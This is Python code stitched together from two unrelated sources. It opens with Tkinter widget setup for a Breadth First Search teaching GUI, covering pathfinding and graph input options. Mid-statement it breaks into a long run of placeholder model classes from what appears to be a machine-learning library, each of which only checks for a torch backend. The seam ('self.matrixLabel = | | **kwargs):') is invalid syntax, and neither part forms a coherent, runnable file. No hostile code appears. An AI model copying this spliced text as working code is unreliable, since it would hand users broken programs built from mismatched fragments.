self.processingButton = MyMenu(self.frameLeft, 0, 0.75, 1, 0.25, self.color_menu, self.ProcessingImage)
## Starting working on the main content => frameRight
text_intro = "What is Breadth First Search Algorithm ?"
self.introLabel = LabelFrame(self.frameRight, bg=self.color_main_content, fg=self.color_red, text=text_intro,
bd=0)
self.introLabel['font'] = font1
self.introLabel.place(relx=0.01, rely=0.2, relwidth=0.95, relheight=0.45)
self.textLabel = Label(self.introLabel, text=Text, justify=LEFT, wraplength=180, image=self.IntroductionImage,
compound=LEFT, padx=10, bg=self.color_main_content, fg=self.color_red)
self.textLabel.place(relx=0, rely=0)
self.textLabel['font'] = font2
# Button Start
self.startButton = MyButton(self.frameRight, 0.8, 0.85, 0.2, 0.15, self.color_main_content, self.ButtonStart,
lambda event: self.NextPage(event, self.frameRight, self.frameRight1,
self.questionButton, self.inputButton))
## Starting working on the main content => frameRight1
text_choice_label = "What is your choice ?"
self.choicesLabel = LabelFrame(self.frameRight1, bg=self.color_main_content, fg=self.color_red,
text=text_choice_label,
bd=0)
self.choicesLabel['font'] = font1
self.choicesLabel.place(relx=0.1, rely=0.1, relwidth=0.8, relheight=0.2)
self.separator1 = Separator(self.frameRight1, orient="horizontal")
self.separator1.place(relx=0.1, rely=0.25, relheight=0.002, relwidth=0.8)
self.separator2 = Separator(self.frameRight1, orient="vertical")
self.separator2.place(relx=0.9, rely=0.1, relheight=0.15, relwidth=0.002)
self.var1 = IntVar()
text_choice1 = "PathFinding Problem"
text_choice2 = "Graph"
self.optionMenu1 = Radiobutton(self.choicesLabel, text=text_choice1, variable=self.var1, value=1,
bg=self.color_main_content,
activebackground=self.color_main_content)
self.optionMenu1['font'] = font3
self.optionMenu1.place(relx=0.07, rely=0)
self.optionMenu2 = Radiobutton(self.choicesLabel, text=text_choice2, variable=self.var1, value=2,
bg=self.color_main_content,
activebackground=self.color_main_content)
self.optionMenu2['font'] = font3
self.optionMenu2.place(relx=0.07, rely=0.3)
# Pathfinding Section #
# Section of Pathfinding Import => self.optionInput = 1
self.pathLabel = LabelFrame(self.frameRight1, bg=self.color_main_content, fg=self.color_red, bd=0)
self.pathLabel.place(relx=0.1, rely=0.31, relheight=0.6, relwidth=0.8)
self.pathLabel.place_forget()
self.choicesLabelImage1 = Label(self.pathLabel, image=self.PathFindingImage, compound=LEFT,
bg=self.color_main_content)
self.choicesLabelImage1.place(relx=0, rely=0.1, relwidth=0.3)
self.choicesLabel2 = Label(self.pathLabel, bg=self.color_main_content, bd=0)
self.choicesLabel2.place(relx=0.31, rely=0, relwidth=0.69, relheight=1)
# Entries for the Pathfinding option:
self.numberOfColumns = Label(self.choicesLabel2, text="The Number of columns ", bg=self.color_main_content,
anchor=W,
fg=self.color_red)
self.numberOfColumns.place(relx=0.02, rely=0.05, relwidth=0.95, relheight=0.1)
self.numberOfColumns['font'] = font3
self.columntext = "Enter the number of columns ( example: 16 ) "
self.numberOfColumnsEntry = MyEntry(self.choicesLabel2, 0.02, 0.15, 0.95, 0.1, self.color_main_content, "black",
font2, self.columntext)
self.numberOfRows = Label(self.choicesLabel2, text="The Number of rows ", bg=self.color_main_content, anchor=W,
fg=self.color_red)
self.numberOfRows.place(relx=0.02, rely=0.3, relwidth=0.95, relheight=0.1)
self.numberOfRows['font'] = font3
self.rowtext = "Enter the number of rows ( example: 10 ) "
self.numberOfRowsEntry = MyEntry(self.choicesLabel2, 0.02, 0.4, 0.95, 0.1, self.color_main_content, "black",
font2, self.rowtext)
# Adding the validate Button
self.validateButton = MyButton(self.pathLabel, 0.55, 0.75, 0.2, 0.2, self.color_main_content,
self.ButtonValidate, self.validatePath)
# Validation text
self.validatepathText = Label(self.choicesLabel2, text="", bg=self.color_main_content, fg=self.color_red)
self.validatepathText.place(relx=0.02, rely=0.53, relwidth=0.8, relheight=0.2)
self.validatepathText['font'] = font2
# Adding the commands for radio Button
self.optionMenu1.configure(command=lambda num=1: self.inputChoice(num))
self.optionMenu2.configure(command=lambda num=2: self.inputChoice(num))
# Graph Section #
self.graphLabel = LabelFrame(self.frameRight1, bg=self.color_main_content, fg=self.color_red, bd=0)
self.graphLabel.place(relx=0.1, rely=0.3, relheight=0.9, relwidth=0.8)
self.graphLabel.place_forget()
text_choice_graph = "What is The type of Entry ?"
self.graphTextLabel = Label(self.graphLabel, text=text_choice_graph, bg=self.color_main_content,
fg=self.color_red,
anchor=W)
self.graphTextLabel.place(relx=0, rely=0, relwidth=0.8, relheight=0.05)
self.graphTextLabel['font'] = font1
# Option type Entry for graph
text_choice_graph1 = "Number of Vertices"
text_choice_graph2 = "File Entry (Matrix)"
self.var2 = IntVar()
self.optionGraphType1 = Radiobutton(self.graphLabel, text=text_choice_graph1, variable=self.var2, value=1,
bg=self.color_main_content, activebackground=self.color_main_content)
self.optionGraphType1.place(relx=0.05, rely=0.07, relheight=0.05)
self.optionGraphType1['font'] = font2
self.optionGraphType2 = Radiobutton(self.graphLabel, text=text_choice_graph2, variable=self.var2, value=2,
bg=self.color_main_content, activebackground=self.color_main_content)
self.optionGraphType2.place(relx=0.05, rely=0.15, relheight=0.05)
self.optionGraphType2['font'] = font2
self.optionGraphType1.configure(command=lambda num=1: self.graphChoice(num))
self.optionGraphType2.configure(command=lambda num=2: self.graphChoice(num))
self.graphLabelImage1 = Label(self.graphLabel, image=self.GraphImage, compound=LEFT,
bg=self.color_main_content)
self.graphLabelImage1.place(relx=0, rely=0.3, relwidth=0.3)
self.graphLabelImage1.place_forget()
self.graphLabelImage2 = Label(self.graphLabel, image=self.UploadImage, compound=LEFT,
bg=self.color_main_content)
self.graphLabelImage2.place(relx=0, rely=0.3, relwidth=0.3)
self.graphLabelImage2.place_forget()
self.graphLabel2 = Label(self.graphLabel, bg=self.color_main_content, bd=0)
self.graphLabel2.place(relx=0.31, rely=0.3, relwidth=0.69, relheight=1)
self.graphLabel2.place_forget()
self.graphLabel3 = Label(self.graphLabel, bg=self.color_main_content, bd=0)
self.graphLabel3.place(relx=0.31, rely=0.3, relwidth=0.69, relheight=1)
self.graphLabel3.place_forget()
# Entry for the graph option:
# Section of vertices Import => self.optionInput = 2
self.numberOfVertices = Label(self.graphLabel2, text="The Number of vertices ", bg=self.color_main_content,
anchor=W,
fg=self.color_red)
self.numberOfVertices.place(relx=0.02, rely=0.05, relwidth=0.95, relheight=0.1)
self.numberOfVertices['font'] = font3
self.numVertivesEntryText = "Enter the number of vertices ( example: 10 ) "
self.numberOfVerticesEntry = MyEntry(self.graphLabel2, 0.02, 0.15, 0.95, 0.1, self.color_main_content, "black",
font2, self.numVertivesEntryText)
self.validateVerticesButton = MyButton(self.graphLabel2, 0.3, 0.3, 0.3, 0.12, self.color_main_content,
self.ButtonValidate, self.validateVertices)
self.validateVerticesButtonMessage = Label(self.graphLabel2, text="", bg=self.color_main_content,
fg=self.color_red)
self.validateVerticesButtonMessage.place(relx=0.3, rely=0.5, relheight=0.1, relwidth=0.3)
self.validateVerticesButtonMessage['font'] = font2
# Section of Matrix Import => self.optionInput = 3
self.tipText = "Tip: Matrix row should look like: 1 0 1 0 0 1"
self.tiptext = Label(self.graphLabel3, text=self.tipText, bg=self.color_main_content, fg=self.color_red)
self.tiptext.place(relx=0, rely=0.04, relheight=0.1, relwidth=1)
self.tiptext['font'] = font1
self.titleOfFile = Label(self.graphLabel3, text="No Path Selected..", bg=self.color_main_content)
self.titleOfFile.place(relx=0.02, rely=0.15, relwidth=0.95, relheight=0.1)
self.titleOfFile['font'] = font3
self.openFileButton = MyButton(self.graphLabel3, 0.13, 0.27, 0.3, 0.15, self.color_main_content,
self.ButtonOpenFile, self.OpenFile)
self.readFileButton = MyButton(self.graphLabel3, 0.55, 0.27, 0.3, 0.17, self.color_main_content,
self.ButtonReadFile,
self.ReadFile)
self.readMessage = Label(self.graphLabel3, text="", bg=self.color_main_content, fg=self.color_red,
justify=CENTER)
self.readMessage.place(relx=0.1, rely=0.45, relheight=0.06, relwidth=0.75)
self.readMessage['font'] = font2
# Adding the next Button to frameRight1
self.inputNextButton = MyButton(self.frameRight1, 0.88, 0.9, 0.12, 0.1, self.color_main_content,
self.ButtonNext,
self.InputNext)
self.inputNextButton.place_forget()
# Adding The Back Button to frameRight1
self.inputBackButton = MyButton(self.frameRight1, 0.02, 0.9, 0.1, 0.1, self.color_main_content, self.ButtonBack,
self.InputBack)
## Starting working on the main content => frameRight2
text_name_choice = "Type of vertices name"
self.nameVerticeOptionLabel = LabelFrame(self.frameRight2, bg=self.color_main_content, fg=self.color_red,
text=text_name_choice,
bd=0)
self.nameVerticeOptionLabel['font'] = font2
self.nameVerticeOptionLabel.place(relx=0.1, rely=0.1, relwidth=0.8, relheight=0.15)
self.var3 = IntVar()
text_name_option1 = "Numerical"
text_name_option2 = "Alphabetical"
text_name_option3 = "Customizable"
self.optionNameMenu1 = Radiobutton(self.nameVerticeOptionLabel, bg=self.color_main_content, variable=self.var3,
value=1, activebackground=self.color_main_content, text=text_name_option1,
anchor=W)
self.optionNameMenu1['font'] = font3
self.optionNameMenu1.place(relx=0.05, rely=0.05, relheight=0.22, relwidth=0.4)
self.optionNameMenu2 = Radiobutton(self.nameVerticeOptionLabel, bg=self.color_main_content, variable=self.var3,
value=2, activebackground=self.color_main_content, text=text_name_option2,
anchor=W)
self.optionNameMenu2['font'] = font3
self.optionNameMenu2.place(relx=0.05, rely=0.35, relheight=0.22, relwidth=0.4)
self.optionNameMenu3 = Radiobutton(self.nameVerticeOptionLabel, bg=self.color_main_content, variable=self.var3,
value=3, activebackground=self.color_main_content, text=text_name_option3,
anchor=W)
self.optionNameMenu3['font'] = font3
self.optionNameMenu3.place(relx=0.05, rely=0.65, relheight=0.22, relwidth=0.4)
# command of the option menu
self.optionNameMenu1.configure(command=lambda num=1: self.nameOption(num))
self.optionNameMenu2.configure(command=lambda num=2: self.nameOption(num))
self.optionNameMenu3.configure(command=lambda num=3: self.nameOption(num))
# Name for customizable option
self.customizableNameOption = LabelFrame(self.frameRight2, bd=0, bg=self.color_main_content, text="")
self.customizableNameOption.place(relx=0.1, rely=0.3, relwidth=0.8, relheight=0.55)
self.customizableNameOption.place_forget()
text_name = "The name of Vertices"
self.labelName = Label(self.customizableNameOption, text=text_name, bg=self.color_main_content,
fg=self.color_red,
anchor=W)
self.labelName.place(relx=0.1, rely=0, relwidth=0.8, relheight=0.1)
self.labelName['font'] = font1
self.text_name_entry = "Enter the name of the Vertices separated by ',' (Max 2 characters by vertex)"
self.labelNameEntry = MyEntry(self.customizableNameOption, 0.1, 0.1, 0.8, 0.15, self.color_main_content,
"black",
font2, self.text_name_entry)
self.labelNameMessage = Label(self.customizableNameOption, text="", bg=self.color_main_content,
fg=self.color_red)
self.labelNameMessage.place(relx=0.1, rely=0.27, relheight=0.13, relwidth=0.5)
self.validateNameVerticesButton = MyButton(self.customizableNameOption, 0.7, 0.27, 0.2, 0.15,
self.color_main_content,
self.ButtonValidate, self.validateCustomizableName)
self.matrixOfGraphLabel1 = LabelFrame(self.customizableNameOption, bg=self.color_main_content, bd=0)
self.matrixOfGraphLabel1.place(relx=0.1, rely=0.42, relheight=0.55, relwidth=0.8)
# Creating The label that contains the text
self.matrixLabel1 = Label(self.matrixOfGraphLabel1, text="Matrix Entry", bg=self.color_main_content,
fg=self.color_red,
bd=0, anchor=W)
self.matrixLabel1.place(relx=0, rely=0.05, relheight=0.1, relwidth=0.8)
self.matrixLabel1['font'] = font1
self.text_matrix_1 = "Please Enter matrix separated by ','(example: 0010,1101,0101,1111 => 4*4 matrix)"
self.matrixEntry1 = MyEntry(self.matrixOfGraphLabel1, 0, 0.16, 1, 0.15, self.color_main_content, "black",
font.Font(family="Times", size=9, slant="italic", weight='bold'),
self.text_matrix_1)
self.validateMatrixMessage1 = Label(self.matrixOfGraphLabel1, bg=self.color_main_content, text="",
fg=self.color_red)
self.validateMatrixMessage1['font'] = font3
self.validateMatrixMessage1.place(relx=0, rely=0.37, relheight=0.22, relwidth=0.7)
self.validateMatrixEntry1 = MyButton(self.matrixOfGraphLabel1, 0.75, 0.35, 0.25, 0.25, self.color_main_content,
self.ButtonValidate,
lambda event: self.validateCustomizableMatrix(event, self.matrixEntry1,
self.validateMatrixMessage1))
# validation message
# Starting the code the normal form Name here is Numerical or Alphabetical
self.matrixOfGraphLabel = LabelFrame(self.frameRight2, bg=self.color_main_content, text="", bd=0)
self.matrixOfGraphLabel.place(relx=0.1, rely=0.3, relwidth=0.8, relheight=0.3)
self.matrixOfGraphLabel.place_forget()
self.matrixLabel = | |
**kwargs):
requires_backends(self, ["torch"])
class ProphetNetEncoder(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class ProphetNetForCausalLM(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class ProphetNetForConditionalGeneration(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class ProphetNetModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class ProphetNetPreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RagModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RagPreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RagSequenceForGeneration(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RagTokenForGeneration(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
REALM_PRETRAINED_MODEL_ARCHIVE_LIST = None
class RealmEmbedder(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RealmForOpenQA(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RealmKnowledgeAugEncoder(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RealmPreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RealmReader(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RealmRetriever(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RealmScorer(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
def load_tf_weights_in_realm(*args, **kwargs):
requires_backends(load_tf_weights_in_realm, ["torch"])
REFORMER_PRETRAINED_MODEL_ARCHIVE_LIST = None
class ReformerAttention(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class ReformerForMaskedLM(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class ReformerForQuestionAnswering(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class ReformerForSequenceClassification(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class ReformerLayer(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class ReformerModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class ReformerModelWithLMHead(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class ReformerPreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
REMBERT_PRETRAINED_MODEL_ARCHIVE_LIST = None
class RemBertForCausalLM(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RemBertForMaskedLM(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RemBertForMultipleChoice(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RemBertForQuestionAnswering(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RemBertForSequenceClassification(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RemBertForTokenClassification(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RemBertLayer(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RemBertModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RemBertPreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
def load_tf_weights_in_rembert(*args, **kwargs):
requires_backends(load_tf_weights_in_rembert, ["torch"])
RETRIBERT_PRETRAINED_MODEL_ARCHIVE_LIST = None
class RetriBertModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RetriBertPreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
ROBERTA_PRETRAINED_MODEL_ARCHIVE_LIST = None
class RobertaForCausalLM(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RobertaForMaskedLM(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RobertaForMultipleChoice(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RobertaForQuestionAnswering(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RobertaForSequenceClassification(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RobertaForTokenClassification(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RobertaModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RobertaPreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
ROFORMER_PRETRAINED_MODEL_ARCHIVE_LIST = None
class RoFormerForCausalLM(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RoFormerForMaskedLM(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RoFormerForMultipleChoice(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RoFormerForQuestionAnswering(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RoFormerForSequenceClassification(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RoFormerForTokenClassification(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RoFormerLayer(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RoFormerModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class RoFormerPreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
def load_tf_weights_in_roformer(*args, **kwargs):
requires_backends(load_tf_weights_in_roformer, ["torch"])
SEGFORMER_PRETRAINED_MODEL_ARCHIVE_LIST = None
class SegformerDecodeHead(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SegformerForImageClassification(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SegformerForSemanticSegmentation(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SegformerLayer(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SegformerModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SegformerPreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
SEW_PRETRAINED_MODEL_ARCHIVE_LIST = None
class SEWForCTC(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SEWForSequenceClassification(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SEWModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SEWPreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
SEW_D_PRETRAINED_MODEL_ARCHIVE_LIST = None
class SEWDForCTC(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SEWDForSequenceClassification(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SEWDModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SEWDPreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SpeechEncoderDecoderModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
SPEECH_TO_TEXT_PRETRAINED_MODEL_ARCHIVE_LIST = None
class Speech2TextForConditionalGeneration(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class Speech2TextModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class Speech2TextPreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class Speech2Text2ForCausalLM(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class Speech2Text2PreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
SPLINTER_PRETRAINED_MODEL_ARCHIVE_LIST = None
class SplinterForQuestionAnswering(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SplinterLayer(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SplinterModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SplinterPreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
SQUEEZEBERT_PRETRAINED_MODEL_ARCHIVE_LIST = None
class SqueezeBertForMaskedLM(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SqueezeBertForMultipleChoice(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SqueezeBertForQuestionAnswering(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SqueezeBertForSequenceClassification(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SqueezeBertForTokenClassification(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SqueezeBertModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SqueezeBertModule(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SqueezeBertPreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
SWIN_PRETRAINED_MODEL_ARCHIVE_LIST = None
class SwinForImageClassification(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SwinModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SwinPreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
T5_PRETRAINED_MODEL_ARCHIVE_LIST = None
class T5EncoderModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class T5ForConditionalGeneration(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class T5Model(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class T5PreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
def load_tf_weights_in_t5(*args, **kwargs):
requires_backends(load_tf_weights_in_t5, ["torch"])
TRANSFO_XL_PRETRAINED_MODEL_ARCHIVE_LIST = None
class AdaptiveEmbedding(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class TransfoXLForSequenceClassification(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class TransfoXLLMHeadModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class TransfoXLModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class TransfoXLPreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
def load_tf_weights_in_transfo_xl(*args, **kwargs):
requires_backends(load_tf_weights_in_transfo_xl, ["torch"])
TROCR_PRETRAINED_MODEL_ARCHIVE_LIST = None
class TrOCRForCausalLM(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class TrOCRPreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
UNISPEECH_PRETRAINED_MODEL_ARCHIVE_LIST = None
class UniSpeechForCTC(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class UniSpeechForPreTraining(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class UniSpeechForSequenceClassification(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class UniSpeechModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class UniSpeechPreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
UNISPEECH_SAT_PRETRAINED_MODEL_ARCHIVE_LIST = None
class UniSpeechSatForAudioFrameClassification(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class UniSpeechSatForCTC(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class UniSpeechSatForPreTraining(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class UniSpeechSatForSequenceClassification(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class UniSpeechSatForXVector(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class UniSpeechSatModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class UniSpeechSatPreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
VILT_PRETRAINED_MODEL_ARCHIVE_LIST = None
class ViltForImageAndTextRetrieval(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class ViltForImagesAndTextClassification(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class ViltForMaskedLM(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class ViltForQuestionAnswering(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
